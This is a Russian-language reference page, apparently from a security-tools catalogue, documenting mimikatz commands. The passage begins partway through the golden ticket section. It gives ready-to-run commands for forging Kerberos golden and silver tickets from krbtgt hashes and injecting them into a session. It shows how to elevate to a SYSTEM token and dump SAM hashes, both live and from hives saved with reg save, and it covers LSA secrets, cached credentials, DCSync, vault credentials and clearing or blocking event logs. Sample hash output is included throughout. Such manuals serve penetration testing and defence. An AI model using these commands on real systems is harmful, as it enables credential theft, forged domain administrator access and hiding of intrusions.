/sid — SID домена (например: S-1-5-21-130452501-2365100805-3685010670).

/user — имя пользователя, кем вы хотите притвориться, помните, что Administrator является не единственным именем этого хорошо известного аккаунта.

/id — опционально — идентификатор пользователя — по умолчанию это: 500 для Administrator.

/groups — опционально — идентификатор групп, которым принадлежит пользователь (первой является главная группа, разделены запятой) — по умолчанию это: 513,512,520,518,519 для групп Administrator'а.

Ключ:

Ключи зависят от тикета:

для золотого они из аккаунта krbtgt;

для серебряного они из "computer account" (аккаунта компьютера) или "service account" (сервисный аккаунт).

Всё это из NTDS.DIT, lsadump::dcsync, lsadump::lsa /inject или lsadump::lsa /patch). Вы должны выбрать один:

/rc4 или /krbtgt — хеш NTLM

/aes128 — ключ AES128

/aes256 — ключ AES256

Цель и служба для Silver Ticket:

/target — имя сервера/компьютера где хостится служба (например: share.server.local, sql.server.local:1433, …)

/service — имя службы для тикета (например: cifs, rpcss, http, mssql, …)

Целевой тикет:

/ticket — опционально — имя файла для вывода тикета — по умолчанию это: ticket.kirbi.

/ptt — без вывода в файл, просто внедрить золотой тикет в текущую сессию.

Пожизненно:

По умолчанию время жизни золотого тикета 10 лет, но это можно настроить. Все смещения в минутах

/startoffset — опционально — начало смещения, отрицательное значение для прошлого, положительное для установки будущего

/endin — опционально — как долго тикет существует (от начала)

/renewmax — опционально — максимальный срок существования тикета, включая продление (от начала)

kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi

Вывод:

User      : utilisateur
Domain    : chocolate.local
SID       : S-1-5-21-130452501-2365100805-3685010670
User Id   : 1107
Groups Id : *513
krbtgt    : 310b643c5316c8c3c70a10cfb17e2e31 - rc4_hmac_nt
Lifetime  : 15/08/2014 01:57:29 ; 12/08/2024 01:57:29 ; 12/08/2024 01:57:29
-> Ticket : utilisateur.chocolate.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Ещё один пример команды:

kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080

Вывод:

User      : Administrateur
Domain    : chocolate.local
SID       : S-1-5-21-130452501-2365100805-3685010670
User Id   : 500
Groups Id : *513 512 520 518 519
krbtgt    : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 - aes256_hmac
Lifetime  : 15/08/2014 01:46:43 ; 15/08/2014 11:46:43 ; 22/08/2014 01:46:43
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrateur @ chocolate.local' successfully submitted for current session

Примечания:

  • изменение пароля/использование смарт-карты не аннулирует Золотой тикет;
  • этот билет не выдаётся настоящим KDC, он не связан с разрешёнными методами шифрования;
  • NTLM хеш аккаунта krbtgt никогда не меняется автоматически

Смотрите также:

tgt

Показывает информацию о TGT текущей сессии.

kerberos::tgt

Пример вывода:

Kerberos TGT of current session :
           Start/End/MaxRenew: 15/08/2014 01:46:43 ; 15/08/2014 11:46:43 ; 22/08/2014 01:46:43
           Service Name (02) : krbtgt ; chocolate.local ; @ chocolate.local
           Target Name  (--) : @ chocolate.local
           Client Name  (01) : Administrateur ; @ chocolate.local
           Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             0000000000000000000000000000000000000000000000000000000000000000
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 0        [...]

        ** Session key is NULL! It means allowtgtsessionkey is not set to 1 **

Примечание: если ключ сессии заполнен 00, то allowtgtsessionkey не включён - http://support.microsoft.com/kb/308339 — ключ сессии не будет экспортироваться для TGT с kerberos::list /export если вы не установите это, это не проблема с TGS.

sekurlsa::tickets /export работает без этого ключа, поскольку она читает сырую память.

list

Выводит список и экспортирует тикеты Kerberos (TGT и TGS) текущей сессии.

Аргументы:

/export — опционально — экспортирует все тикеты в файл

kerberos::list /export

Пример вывода:

[00000000] - 12
   Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
   Server Name       : krbtgt/CHOCOLATE.LOCAL @ CHOCOLATE.LOCAL
   Client Name       : Administrateur @ CHOCOLATE.LOCAL
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
   * Saved to file     : 0-40e10000-Administrateur@krbtgt~CHOCOLATE.LOCAL-CHOCOLATE.LOCAL.kirbi

[00000001] - 12
   Start/End/MaxRenew: 24/04/2014 15:13:03 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
   Server Name       : cifs/srvcharly.chocolate.local @ CHOCOLATE.LOCAL
   Client Name       : Administrateur @ CHOCOLATE.LOCAL
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file     : 1-40a50000-Administrateur@cifs~srvcharly.chocolate.local-CHOCOLATE.LOCAL.kirbi

Смотрите также:

purge

Удаляет все тикеты текущего сеанса.

kerberos::purge
Ticket(s) purge for current session is OK

ask

Спрашивает или получает TGS тикеты. Функция не документирована.

ptc

Pass-the-ccache [NT6]. Функция не документирована.

hash

Хеширует пароли в ключи. Функция не документирована.

clist

Выводит списки тикетов в MIT/Heimdall ccache. Функция не документирована.

Модуль lsadump

Команды: sam, secrets, cache, lsa, trust, backupkeys, rpdata, dcsync, netsync.

sam

Эта команда дампит базу данных Security Account Managers (SAM). Она содержит NTLM и иногда LM хеши, пароли пользователей. Она может работать в двух режимах: онлайн (с пользователем SYSTEM или токеном) и офлайн (с SYSTEM и SAM hives или резервной копией)

онлайн

Если вы не SYSTEM или не используете токен имперсонализации SYSTEM, у вас возникнет ошибка доступ отклонён. Команда:

lsadump::sam

Вызовет ошибку:

Domain : HACKWARE-MIAL
SysKey : 6f84181c4e4720cf9fa3c336533faa27
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

В этом случае вы можете использовать psexec чтобы начать SYSTEM (или другой инструмент) или повысить командой token::elevate для подмены токена SYSTEM. Получаем привилегии debug (отладки):

privilege::debug
Privilege '20' OK

Проверяем свой токен:

token::whoami

Вывод:

 * Process Token : {0;00047b95} 1 F 4860012     HACKWARE-MIAL\MiAl      S-1-5-21-4099021954-1290662600-116018068-1001   (14g,24p)       Primary
 * Thread Token  : no token

Притворяемся SYSTEM:

token::elevate

Вывод:

Token Id  : 0
User name :
SID name  : NT AUTHORITY\СИСТЕМА

596     {0;000003e7} 1 D 27779          NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;00047b95} 1 F 4860012     HACKWARE-MIAL\MiAl      S-1-5-21-4099021954-1290662600-116018068-1001   (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 5481549     NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,21p)       Impersonation (Delegation)

Извлекаем хеши:

lsadump::sam

Пример вывода:

Domain : HACKWARE-MIAL
SysKey : 6f84181c4e4720cf9fa3c336533faa27
Local SID : S-1-5-21-4099021954-1290662600-116018068

SAMKey : 18856f3214a2a6b65e7c6b9b14c1003a

RID  : 000001f4 (500)
User : Администратор

RID  : 000001f5 (501)
User : Гость

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: b7bb6bfc7dc3bb615fdc746d6566fd33

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 2baaac7a5ba11c314d1c65c0fdd0232e

* Primary:Kerberos-Newer-Keys *
    Default Salt : WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8bc0cc1e4a81550665edbf52f92ec062284eb2e4c9d397c465ecfd164351bec9
      aes128_hmac       (4096) : c9e28068fc273a659625e30d3bbaf18e
      des_cbc_md5       (4096) : 61299e7a768fa2d5

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WDAGUtilityAccount
    Credentials
      des_cbc_md5       : 61299e7a768fa2d5


RID  : 000003e9 (1001)
User : MiAl

RID  : 000003ea (1002)
User : ShareOverlord
  Hash NTLM: 7ce21f17c0aee7fb9ceba532d0546ad6

офлайн

Вы можете сделать резервную копию SYSTEM и SAM hives командами:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

Или использовать Volume Shadow Copy / BootCD для создания резервных копий этих файлов:

  • C:\Windows\System32\config\SYSTEM
  • C:\Windows\System32\config\SAM

Конечно, вы можете использовать файлы напрямую от другой установки Windows.

Затем:

lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

Пример вывода:

Domain : HACKWARE-MIAL
SysKey : 6f84181c4e4720cf9fa3c336533faa27
Local SID : S-1-5-21-4099021954-1290662600-116018068

SAMKey : 18856f3214a2a6b65e7c6b9b14c1003a

RID  : 000001f4 (500)
User : Администратор

RID  : 000001f5 (501)
User : Гость

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: b7bb6bfc7dc3bb615fdc746d6566fd33

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 2baaac7a5ba11c314d1c65c0fdd0232e

* Primary:Kerberos-Newer-Keys *
    Default Salt : WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8bc0cc1e4a81550665edbf52f92ec062284eb2e4c9d397c465ecfd164351bec9
      aes128_hmac       (4096) : c9e28068fc273a659625e30d3bbaf18e
      des_cbc_md5       (4096) : 61299e7a768fa2d5

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WDAGUtilityAccount
    Credentials
      des_cbc_md5       : 61299e7a768fa2d5


RID  : 000003e9 (1001)
User : MiAl

RID  : 000003ea (1002)
User : ShareOverlord
  Hash NTLM: 7ce21f17c0aee7fb9ceba532d0546ad6

secrets

Получить SysKey для расшифровки записей SECRETS (из реестра или hives)

Данная функция не документирована.

lsadump::secrets

Пример вывода:

Domain : HACKWARE-MIAL
SysKey : 6f84181c4e4720cf9fa3c336533faa27

Local name : HACKWARE-MIAL ( S-1-5-21-4099021954-1290662600-116018068 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
LSA Key(s) : 1, default {2b63c189-ae3e-dbc3-4054-70bc6d3656e6}
  [00] {2b63c189-ae3e-dbc3-4054-70bc6d3656e6} 7e4aecd0c29eea30586554b50e7d8635afd6e50ba668eb4521f0ffdb81645cd8

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 8b 96 b4 48 4e d9 34 51 79 38 80 e9 af a5 77 78 8e 0f da ac 76 66 6c 05 63 aa 7d 34 2a f9 3f 60 af 14 69 2a a2 73 cc 81
    full: 8b96b4484ed93451793880e9afa577788e0fdaac76666c0563aa7d342af93f60af14692aa273cc81
    m/u : 8b96b4484ed93451793880e9afa577788e0fdaac / 76666c0563aa7d342af93f60af14692aa273cc81
old/hex : 01 00 00 00 6b 0f 95 f1 80 9d 73 3e 4d db ee ab 3b ec 76 dd e7 1f 84 33 11 52 a6 ed 17 58 4f 46 65 23 bf a2 f0 e7 64 b0 3d 40 0a 0c
    full: 6b0f95f1809d733e4ddbeeab3bec76dde71f84331152a6ed17584f466523bfa2f0e764b03d400a0c
    m/u : 6b0f95f1809d733e4ddbeeab3bec76dde71f8433 / 1152a6ed17584f466523bfa2f0e764b03d400a0c

Secret  : L$_SQSA_S-1-5-21-4099021954-1290662600-116018068-1001
cur/text: {"version":1,"questions":[]}

Secret  : NL$KM
cur/hex : 7b 18 56 29 ea d4 50 81 30 ef 0a 4b 05 e5 92 eb 38 76 92 79 7a 46 44 c5 52 df 42 75 1f 4a 38 2f 4d 7f 5b c4 5d 7c ef 6e 95 78 65 77 19 43 32 1b 76 bd de 29 c4 ad 38 ca ce c2 64 f3 e9 76 30 a6
old/hex : 7b 18 56 29 ea d4 50 81 30 ef 0a 4b 05 e5 92 eb 38 76 92 79 7a 46 44 c5 52 df 42 75 1f 4a 38 2f 4d 7f 5b c4 5d 7c ef 6e 95 78 65 77 19 43 32 1b 76 bd de 29 c4 ad 38 ca ce c2 64 f3 e9 76 30 a6

cache

Получить SysKey для расшифровки NL$KM затем MSCache(v2) (из реестра или hives)

Данная функция не документирована. 

lsadump::cache

Пример вывода:

Domain : HACKWARE-MIAL
SysKey : 6f84181c4e4720cf9fa3c336533faa27

Local name : HACKWARE-MIAL ( S-1-5-21-4099021954-1290662600-116018068 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
LSA Key(s) : 1, default {2b63c189-ae3e-dbc3-4054-70bc6d3656e6}
  [00] {2b63c189-ae3e-dbc3-4054-70bc6d3656e6} 7e4aecd0c29eea30586554b50e7d8635afd6e50ba668eb4521f0ffdb81645cd8

* Iteration is set to default (10240)

lsa

Спрашивает LSA сервер для получения записей SAM/AD (обычно патчит на лету или внедряет)

Данная функция не документирована.

lsadump::lsa

Пример вывода:

Domain : HACKWARE-MIAL / S-1-5-21-4099021954-1290662600-116018068

RID  : 000003eb (1003)
User : Alexey
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003

RID  : 000001f7 (503)
User : DefaultAccount
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003

RID  : 000003e9 (1001)
User : MiAl
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003

RID  : 000003ea (1002)
User : ShareOverlord
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003

RID  : 000001f8 (504)
User : WDAGUtilityAccount
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003

RID  : 000001f4 (500)
User : Администратор
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003

RID  : 000001f5 (501)
User : Гость
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003

dcsync

Эта команда использует протокол DRSR для запроса контроллера домена синхронизировать указанную запись. Это тот же протокол, что контроллеры доменов используют между собой.

Аргументы:

/domain — опционально — полностью определённое доменное имя домена, который вы хотите синхронизировать (по умолчанию: ваш собственный домен)

/dc — опционально — полностью определённое доменное имя контроллера доменов, который вы хотите синхронизировать (по умолчанию: определяется автоматически по доменному имени)

Модуль vault

Модуль Vault/учётных данных Windows.

Команды: list, cred

list

Команда не документирована.

vault::list

Пример вывода:

Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
        Name       : Учетные данные для Интернета
        Path       : C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        Items (0)

Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}
        Name       : Учетные данные Windows
        Path       : C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Vault
        Items (0)

cred

Команда не документирована.

vault::cred

Пример вывода:

TargetName : WindowsLive:target=virtualapp/didlogical / <NULL>
UserName   : 02zatsqfhszosxth
Comment    : PersistedCredential
Type       : 1 - generic
Persist    : 2 - local_machine
Flags      : 00000000
Credential :
Attributes : 33

Модуль token

Модуль манипуляции токеном.

Команды: whoami, list, elevate, revert

whoami

Показывает текущую идентичность.

token::whoami

Пример вывода:

 * Process Token : {0;00049d56} 1 F 1050770     HACKWARE-MIAL\MiAl      S-1-5-21-4099021954-1290662600-116018068-1001   (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 1161905     NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,21p)       Impersonation (Delegation)

list

Выводит список всех токенов системы.

token::whoami

Пример вывода:

600     {0;000003e7} 1 D 27456          NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,21p)       Primary
648     {0;000003e7} 0 D 28624          NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,31p)       Primary
740     {0;0000819c} 1 D 33609          Font Driver Host\UMFD-1 S-1-5-96-0-1    (09g,02p)       Primary
748     {0;0000814a} 0 D 33607          Font Driver Host\UMFD-0 S-1-5-96-0-0    (08g,02p)       Primary
824     {0;000003e7} 0 D 34352          NT AUTHORITY\СИСТЕМА    S-1-5-18        (10g,28p)       Primary
844     {0;000003e7} 0 D 35507          NT AUTHORITY\СИСТЕМА    S-1-5-18        (15g,28p)       Primary
896     {0;000003e4} 0 D 47896          NT AUTHORITY\NETWORK SERVICE    S-1-5-20        (10g,03p)       Primary
948     {0;000003e7} 0 D 55422          NT AUTHORITY\СИСТЕМА    S-1-5-18        (10g,28p)       Primary
1016    {0;0000de6d} 1 L 57013          Window Manager\DWM-1    S-1-5-90-0-1    (10g,04p)       Primary
524     {0;000003e5} 0 D 60688          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (19g,11p)       Primary
712     {0;000003e5} 0 D 61123          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (15g,02p)       Primary
1064    {0;000003e7} 0 D 62786          NT AUTHORITY\СИСТЕМА    S-1-5-18        (11g,04p)       Primary
1092    {0;000003e5} 0 D 63224          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (16g,02p)       Primary
1112    {0;000003e5} 0 D 63690          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (15g,02p)       Primary
1160    {0;000003e7} 0 D 64472          NT AUTHORITY\СИСТЕМА    S-1-5-18        (11g,28p)       Primary
1240    {0;000003e7} 0 D 66275          NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,07p)       Primary
1288    {0;000003e5} 0 D 67918          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (15g,03p)       Primary
1296    {0;000003e5} 0 D 68101          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (15g,02p)       Primary
1340    {0;000003e7} 0 D 69221          NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,09p)       Primary
1416    {0;000003e5} 0 D 70827          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (15g,03p)       Primary
1444    {0;000003e7} 0 D 71829          NT AUTHORITY\СИСТЕМА    S-1-5-18        (11g,05p)       Primary
1484    {0;000003e5} 0 D 72734          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (15g,02p)       Primary
1608    {0;000003e7} 0 D 77194          NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,28p)       Primary
1680    {0;000003e4} 0 D 78720          NT AUTHORITY\NETWORK SERVICE    S-1-5-20        (10g,04p)       Primary
1692    {0;000003e4} 0 D 79024          NT AUTHORITY\NETWORK SERVICE    S-1-5-20        (10g,02p)       Primary
1792    {0;000003e7} 0 D 81653          NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,28p)       Primary
1856    {0;000003e5} 0 D 83125          NT AUTHORITY\LOCAL SERVICE      S-1-5-19        (15g,02p)       Primary

elevate

Подменяет токен.

token::elevate

Пример результатов работы:

Token Id  : 0
User name :
SID name  : NT AUTHORITY\СИСТЕМА

600     {0;000003e7} 1 D 27456          NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;00049d56} 1 F 1050770     HACKWARE-MIAL\MiAl      S-1-5-21-4099021954-1290662600-116018068-1001   (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 2337658     NT AUTHORITY\СИСТЕМА    S-1-5-18        (04g,21p)       Impersonation (Delegation)

run

Команда не документирована.

revert

Возврат к исходному токену процесса.

token::revert

Пример работы:

 * Process Token : {0;00049d56} 1 F 1050770     HACKWARE-MIAL\MiAl      S-1-5-21-4099021954-1290662600-116018068-1001   (14g,24p)       Primary
 * Thread Token  : no token

Модуль event

Работа с фиксацией событий.

Команды: drop, clear

drop

[экспериментальная] команда патчит службу Events для предотвращения записи новых событий.

clear

Очищает журнал событий.

Модуль ts

Команды: multirdp, sessions, remote

Модуль Terminal Server (терминального сервера).

multirdp

[экспериментальная] команда патчит службу Terminal Server чтобы разрешить сессии с несколькими пользователями.

sessions

Команда не документирована.

remote

Команда не документирована.

Модуль process

Команды: list, exports, imports, start, stop, suspend, resume

Работа с процессами.

list

Выводит список запущенных процессов.

process::list

Пример вывода:

0       (null)
4       System
88      Registry
332     smss.exe
428     csrss.exe
500     wininit.exe
512     csrss.exe
596     winlogon.exe
632     services.exe
640     lsass.exe
736     fontdrvhost.exe
744     fontdrvhost.exe
760     svchost.exe
836     svchost.exe
888     svchost.exe
940     svchost.exe
1004    dwm.exe
708     svchost.exe
272     svchost.exe
1060    svchost.exe
1068    svchost.exe

exports

Выводи список экспортов.

Команда не документирована.

imports

Выводи список импортов.

Команда не документирована.

start

Запуск процесса.

Команда не документирована.

stop

Остановка процесса.

Команда не документирована.

suspend

Приостановка процесса.

Команда не документирована.

resume

Возобновление процесса.

Команда не документирована.

run

Команда не документирована.

runp

Команда не документирована.

Модуль service

Работы со службами.

Команды: start, remove, stop, suspend, resume, preshutdown, shutdown, list

start

Запуск службы.

Команда не документирована.

remove

Удаление службы.

Команда не документирована.

stop

Остановка службы.

Команда не документирована.

suspend

Приостановление службы.

Команда не документирована.

resume

Возобновление службы.

Команда не документирована.

preshutdown

Команда не документирована.

shutdown

Команда не документирована.

list

Команда не документирована.

+

Установка службы 'mimikatzsvc'.

Команда не документирована.

service::+

Пример выполнения:

[*] 'mimikatzsvc' service not present
[+] 'mimikatzsvc' service successfully registered
[+] 'mimikatzsvc' service ACL to everyone
[+] 'mimikatzsvc' service started

-

Удаление службы 'mimikatzsvc'.

Команда не документирована.

service::-

Пример выполнения:

[+] 'mimikatzsvc' service stopped
[+] 'mimikatzsvc' service removed
service::me

Команда не документирована.

Модуль net

Команды: user, localgroup, group, alias, session, wsession, tod, stats, share, serverinfo, trust, deleg

user

Команда не документирована.

net::user

Пример выполнения:

Domain name : Builtin
Domain SID  : S-1-5-32

Domain name : HACKWARE-SERVER
Domain SID  : S-1-5-21-2427285453-1109523155-3842872757
 503   DefaultAccount
 | 513   Отсутствует    (Group)
 |´581   Управляемая системой группа учетных записей    (Alias)
 504   WDAGUtilityAccount
 | 513   Отсутствует    (Group)
 500   Администратор
 | 513   Отсутствует    (Group)
 |´544   Администраторы (Alias)
 501   Гость
 | 513   Отсутствует    (Group)
 |´546   Гости  (Alias)

localgroup

Команда не документирована, возможно, удалена.

group

Команда не документирована.

net::group

Пример выполнения:

Domain name : Builtin
Domain SID  : S-1-5-32

Domain name : HACKWARE-MIAL
Domain SID  : S-1-5-21-4099021954-1290662600-116018068
 513   Отсутствует
 | 500   Администратор  (User)
 | 501   Гость  (User)
 | 503   DefaultAccount (User)
 | 504   WDAGUtilityAccount     (User)
 | 1001  MiAl   (User)
 | 1002  ShareOverlord  (User)
 | 1003  Alexey (User)

alias

Команда не документирована.

net::alias

Пример выполнения:

Domain name : Builtin
Domain SID  : S-1-5-32
 568   IIS_IUSRS
 | S-1-5-17
 544   Администраторы
 | S-1-5-21-2427285453-1109523155-3842872757-500
 578   Администраторы Hyper-V
 582   Администраторы реплики хранилища
 583   Владельцы устройства
 546   Гости
 | S-1-5-21-2427285453-1109523155-3842872757-501
 574   Доступ DCOM службы сертификации
 569   Криптографические операторы
 551   Операторы архива
 556   Операторы настройки сети
 550   Операторы печати
 579   Операторы помощи по контролю учетных записей
 547   Опытные пользователи
 545   Пользователи
 | S-1-5-4
 | S-1-5-11
 562   Пользователи DCOM
 559   Пользователи журналов производительности
 558   Пользователи системного монитора
 555   Пользователи удаленного рабочего стола
 580   Пользователи удаленного управления
 552   Репликатор
 576   Серверы конечных точек RDS
 575   Серверы удаленного доступа RDS
 577   Серверы управления RDS
 581   Управляемая системой группа учетных записей
 | S-1-5-21-2427285453-1109523155-3842872757-503
 573   Читатели журнала событий

Domain name : HACKWARE-SERVER
Domain SID  : S-1-5-21-2427285453-1109523155-3842872757

session

Видимо, показывает активные сессии подключения к шарам, т. е. сетевым папкам.

Команда не документирована.

net::session

Пример выполнения:

Client  : \\[fe80::58ff:c68d:cfc4:7428]
Username: ShareOverlord
Active  : 804
Idle    : 172

wsession

Видемо, показывает информацию о пользователях, выполнивших вход.

Команда не документирована.

net::wsession

Пример выполнения:

Username   : Alexey
Domain     : HACKWARE-MIAL
LogonServer: HACKWARE-MIAL

Username   : Alexey
Domain     : HACKWARE-MIAL
LogonServer: HACKWARE-MIAL

Username   : MiAl
Domain     : HACKWARE-MIAL
LogonServer: HACKWARE-MIAL

Username   : MiAl
Domain     : HACKWARE-MIAL
LogonServer: HACKWARE-MIAL

tod

Команда не документирована.

net::tod

Пример выполнения:

Remote time (local): 29.01.2020 17:53:22

stats

Команда не документирована.

net::stats

Пример выполнения:

LanmanWorkstation StatisticsStartTime: 29.01.2020 16:47:18

share

Видимо, показывает общие папки (шары).

Команда не документирована.

net::share

Пример выполнения:

Netname : ADMIN$
Type    : 80000000 - disktree ; special ;
Uses    : 0/4294967295
Path    : C:\WINDOWS

Netname : C$
Type    : 80000000 - disktree ; special ;
Uses    : 0/4294967295
Path    : C:\

Netname : IPC$
Type    : 80000003 - ipc ; special ;
Uses    : 0/4294967295
Path    :

Netname : Share
Type    : 00000000 - disktree ;
Uses    : 1/4294967295
Path    : C:\Share

Netname : ShareRestricted
Type    : 00000000 - disktree ;
Uses    : 0/4294967295
Path    : C:\ShareRestricted

Netname : Users
Type    : 00000000 - disktree ;
Uses    : 0/4294967295
Path    : C:\Users

serverinfo

Команда не документирована.

net::serverinfo

Пример выполнения:

platform_id: 500
name       : HACKWARE-SERVER
version    : 10.0
comment    :
type       : 00009003 - workstation ; server ; nt ; server_nt ;

trust

Команда не документирована.

deleg

Команда не документирована.

Модуль misc

Разные команды.

Команды: cmd, regedit, taskmgr, ncroutemon, detours, wifi, addsid, memssp, skeleton, memssp, skeleton, compressme, lock, wp, mflt, easyntlmchall, clip

cmd

Командная строка (без DisableCMD).

regedit

Редактор реестра (без DisableRegistryTools)

taskmgr

Менеджер задач (без DisableTaskMgr)

ncroutemon

Juniper Network Connect (без контроля маршрута)

detours

[экспериментальная] функция пробует перечислить все модули с хуками типа Detours.

wifi

Команда не документирована и, возможно, удалена.

addsid

Команда не документирована и, возможно, удалена.

memssp

Команда не документирована.

skeleton

Команда не документирована.

compressme

Команда не документирована.

lock

Команда не документирована. Блокирует экран.

wp

Команда не документирована.

mflt

Команда не документирована.

misc::mflt

Пример вывода:

0 1     409800 bindflt
0 0     244000 storqosflt
0 1     189900 wcifs
0 0     180451 CldFlt
0 0     141100 FileCrypt
0 1     135000 luafv
0 1      46000 npsvctrig
0 2      40700 Wof
0 4      40500 FileInfo

easyntlmchall

Команда не документирована.

clip

Команда не документирована. Следит за буфером обмена.

Модуль library mimilib

Не документировано.

Модуль driver mimidrv

Не документировано.

Примеры запуска mimikatz

 

 

Установка mimikatz

Программа предустановлена в Kali Linux.

Установка в BlackArch

Программа предустановлена в BlackArch.

sudo pacman -S mimikatz

Установка в Windows

1. Перейдите на страницу https://github.com/gentilkiwi/mimikatz/releases, скачайте файл mimikatz_trunk.7z или mimikatz_trunk.zip. Распакуйте скаченный архив.

2. Откройте PowerShell (Win+x → Windows PowerShell (администратор)) или командную строку (Win+r → cmd).

3. Перейдите в папку с исполнимым файлом mimikatz.exe. К примеру, архив распакован в папку C:\Users\MiAl\Downloads, тогда исполнимый файл будет в папке C:\Users\MiAl\Downloads\mimikatz_trunk\x64\:

cd C:\Users\MiAl\Downloads\mimikatz_trunk\x64\

Запустите исполнимый файл.

.\mimikatz.exe

Информация об установке в другие операционные системы будет добавлена позже.

Скриншоты mimikatz

Инструкции по mimikatz

Близкие программы:

  • WPForce (75.8%)
  • mXtract (66.3%)
  • keimpx (66.3%)
  • Invoke-TheHash (66.3%)
  • Backdoor Factory (BDF) (63.9%)
  • truffleHog (RANDOM - 16.6%)
  • Рекомендуется Вам:

    Comments are Closed